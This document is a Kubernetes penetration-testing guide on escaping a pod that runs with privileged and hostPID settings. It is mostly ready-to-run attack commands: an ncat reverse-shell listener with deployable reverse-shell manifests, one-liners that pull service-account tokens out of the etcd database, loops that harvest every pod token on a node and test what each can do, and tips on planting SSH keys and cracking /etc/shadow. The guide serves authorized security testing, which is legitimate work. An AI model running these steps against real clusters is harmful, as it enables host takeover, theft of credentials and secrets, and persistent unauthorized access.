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Bad Pod #2: Privileged and hostPID

In this scenario, the only thing that changes from the everything-allowed pod is how you gain root access to the host. Rather than chrooting to the host’s filesystem, you can use nsenter to get a root shell on the node running your pod.

Why does it work?

  • Privileged - The privileged: true container-level security context breaks down almost all the walls that containers are supposed to provide. The PID namespace is one of the few walls that stands, however. Without hostPID, nsenter would only work to enter the namespaces of a process running within the container. For more examples on what you can do if you only have privileged: true, refer to the next example Bad Pod #3: Privileged Only.
  • Privileged + hostPID - When both hostPID: true and privileged: true are set, the pod can see all of the processes on the host, and you can enter the init system (PID 1) on the host, and execute your shell on the node.

Once you are root on the host, the privilege escalation paths are all the same as described in Bad Pod # 1: Everything-allowed

Table of Contents

Pod creation & access

Exec pods

Create one or more of these resource types and exec into the pod


kubectl apply -f
kubectl exec -it priv-and-hostpid-exec-pod -- bash

Job, CronJob, Deployment, StatefulSet, ReplicaSet, ReplicationController, DaemonSet

  • Replace [RESOURCE_TYPE] with deployment, statefulset, job, etc.
kubectl apply -f[RESOURCE_TYPE]/priv-and-hostpid-exec-[RESOURCE_TYPE].yaml 
kubectl get pods | grep priv-and-hostpid-exec-[RESOURCE_TYPE]      
kubectl exec -it priv-and-hostpid-exec-[RESOURCE_TYPE]-[ID] -- bash

Keep in mind that if pod security policy blocks the pod, the resource type will still get created. The admission controller only blocks the pods that are created by the resource type.

To troubleshoot a case where you don't see pods, use kubectl describe

kubectl describe priv-and-hostpid-exec-[RESOURCE_TYPE]

Reverse shell pods

Create one or more of these resources and catch the reverse shell

Step 1: Set up listener

ncat --ssl -vlp 3116

Step 2: Create pod from local manifest without modifying it by using env variables and envsubst

  • Replace [RESOURCE_TYPE] with deployment, statefulset, job, etc.
  • Replace the HOST and PORT values to point the reverse shell to your listener
HOST="" PORT="3116" envsubst < ./manifests/priv-and-hostpid/[RESOURCE_TYPE]/priv-and-hostpid-revshell-[RESOURCE_TYPE].yaml | kubectl apply -f -

Step 3: Catch the shell

$ ncat --ssl -vlp 3116
Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: Listening on :::3116
Ncat: Listening on
Connection received on 42035

Deleting resources

You can delete a resource using it's manifest, or by name. Here are some examples:

kubectl delete [type] [resource-name]
kubectl delete -f manifests/priv-and-hostpid/pod/priv-and-hostpid-exec-pod.yaml
kubectl delete -f
kubectl delete pod priv-and-hostpid-exec-pod
kubectl delete cronjob priv-and-hostpid-exec-cronjob

Post exploitation

Can you run your pod on a control-plane node

The pod you created above was likely scheduled on a worker node. Before jumping into post exploitation on the worker node, it is worth seeing if you run your a pod on a control-plane node. If you can run your pod on a control-plane node using the nodeName selector in the pod spec, you might have easy access to the etcd database, which contains all of the configuration for the cluster, including all secrets. This is not a possible on cloud managed Kubernetes clusters like GKE and EKS - they hide the control-plane.

Get nodes

kubectl get nodes
NAME                STATUS   ROLES    AGE   VERSION
k8s-control-plane   Ready    master   93d   v1.19.1
k8s-worker          Ready    <none>   93d   v1.19.1

Pick your manifest, uncomment and update the nodeName field with the name of the control-plane node

nodeName: k8s-control-plane

Create your pod

kubectl apply -f manifests/priv-and-hostpid/job/priv-and-hostpid-exec-job.yaml

Read secrets from etcd

If you can run your pod on a control-plane node using the nodeName selector in the pod spec, you might have easy access to the etcd database, which contains all of the configuration for the cluster, including all secrets.

Below is a quick and dirty way to grab secrets from etcd if it is running on the control-plane node you are on. If you want a more elegant solution that spins up a pod with the etcd client utility etcdctl and uses the control-plane node's credentials to connect to etcd wherever it is running, check out this example manifest from @mauilion.

Check to see if etcd is running on the control-plane node and see where the database is (This is on a kubeadm created cluster)

root@k8s-control-plane:/var/lib/etcd/member/wal# ps -ef | grep etcd | sed s/\-\-/\\n/g | grep data-dir



View the data in etcd database:

strings /var/lib/etcd/member/snap/db | less

Extract the tokens from the database and show the service account name

db=`strings /var/lib/etcd/member/snap/db`; for x in `echo "$db" | grep eyJhbGciOiJ`; do name=`echo "$db" | grep $x -B40 | grep registry`; echo $name \| $x; echo; done

Same command, but some greps to only return the default token in the kube-system namespace

db=`strings /var/lib/etcd/member/snap/db`; for x in `echo "$db" | grep eyJhbGciOiJ`; do name=`echo "$db" | grep $x -B40 | grep registry`; echo $name \| $x; echo; done | grep kube-system | grep default


1/registry/secrets/kube-system/default-token-d82kb | eyJhbGciOiJSUzI1NiIsImtpZCI6IkplRTc0X2ZP[REDACTED]

Look for kubeconfigs in the host filesystem

By default, nodes don't have kubectl installed. If you are lucky though, an administrator tried to make their life (and yours) a little easier by installing kubectl and their highly privileged credentials on the node. We're not so lucky on this GKE node

Some ideas:

find / -name kubeconfig
find / -name .kube
grep -R "current-context" /home/
grep -R "current-context" /root/

Grab all tokens from all pods on the system

You can access any secret mounted within any pod on the node you are on. In a production cluster, even on a worker node, there is usually at least one pod that has a mounted token that is bound to a service account that is bound to a clusterrolebinding, that gives you access to do things like create pods or view secrets in all namespaces.

Look for tokens that have permissions to get secrets in kube-system. The examples below automate this process for you a bit:

Simply list the namespace and location of every token

kubectl exec -it priv-and-hostpid-exec-pod -- bash
tokens=`find /var/lib/kubelet/pods/ -name token -type l`; \
for token in $tokens; \
do parent_dir="$(dirname "$token")"; \
namespace=`cat $parent_dir/namespace`; \
echo $namespace "|" $token ; \
done | sort

What does do?

  • Takes the pod name and namespace as input
  • Grabs all of the tokens from /var/lib/kubelet/pods/* on the host
  • Loops each token against the selfsubjectaccessreviews endpoint: kubectl --token=$token auth can-i [$user-input]

Run where you have kubectl installed and NOT from within the priv pod

./ -i "--list -n kube-system"
./ -i "--list -n default"
./ -i "list secrets -n kube-system"
./ -i "create pods -n kube-system"
./ -i "create clusterrolebindings"

Example Run on kubeadm cluster showing that the kubevol-token can list secrets in kube-system

./ -n development -p priv-and-hostpid-exec-pod -i "get secrets -n kube-system"
Token Location: /var/lib/kubelet/pods/21b0eb3f-b99e-40ed-bedf-198c77dfc101/volumes/
Can I get secrets -n kube-system?

Token Location: /var/lib/kubelet/pods/75c4da2c-29ef-41c2-bc66-5994a690abd0/volumes/
Can I get secrets -n kube-system?
...omitted for brevity...

Run this where you have kubectl installed and NOT from within the priv pod.

tokens=`kubectl exec -it priv-and-hostpid-exec-pod -- find /var/lib/kubelet/pods/ -name token -type l`; \
for filename in $tokens; \
do filename_clean=`echo $filename | tr -dc '[[:print:]]'`; \
echo "Token Location: $filename_clean"; \
tokena=`kubectl exec -it priv-and-hostpid-exec-pod -- cat $filename_clean`; \
echo -n "What can I do? "; \
kubectl --token=$tokena auth can-i --list; echo; \

This is what just happened:

  • From outside the pod, you execute kubectl exec to find all of the token locations on the host
  • You then iterate through the list of filenames, and
    • Print the token location
    • Run kubectl auth can-i list using each token via the --token command line argument.
  • This gives you a list of the actions each token can perform cluster wide.

The next command will do the same thing, but just in the kube-system namespace.

Run kubectl can-i --list -n kube-system against ALL tokens found on the node

Run this where you have kubectl installed, and NOT from within the priv pod.

tokens=`kubectl exec -it priv-and-hostpid-exec-pod -- find /var/lib/kubelet/pods/ -name token -type l`; \
for filename in $tokens; \
do filename_clean=`echo $filename | tr -dc '[[:print:]]'`; \
echo "Token Location: $filename_clean"; \
tokena=`kubectl exec -it priv-and-hostpid-exec-pod -- cat $filename_clean`; \
echo -n "What can I do? "; \
kubectl --token=$tokena auth can-i --list -n kube-system; echo; \

Can any of the tokens:

  • Create a pod, deployment, etc. in the kube-system namespace?
  • Create a role in the kube-system namespace?
  • View secrets in the kube-system namespace?
  • Create clusterrolebindings?

You are looking for a way to access to all resources in all namespaces.

Some other ideas

  • Add your public key authorized_keys on the node and ssh to it
  • Crack passwords in /etc/shadow, see if you can use them to access control-plane nodes
  • Look at the volumes that each of the pods have mounted. You might find some pretty sensitive stuff in there.

Attacks that apply to all pods, even without any special permissions

To see these in more detail, head over to nothing-allowed/

  • Access the cloud metadata service
  • Kube-apiserver or kubelet with anonymous-auth enabled
  • Kubernetes exploits
  • Hunting for vulnerable application/services in the cluster

Demonstrate impact

If you are performing a penetration test, the end goal is not to gain cluster-admin, but rather to demonstrate the impact of exploitation. Use the access you have gained to accomplish the objectives of the penetration test.

References and further reading: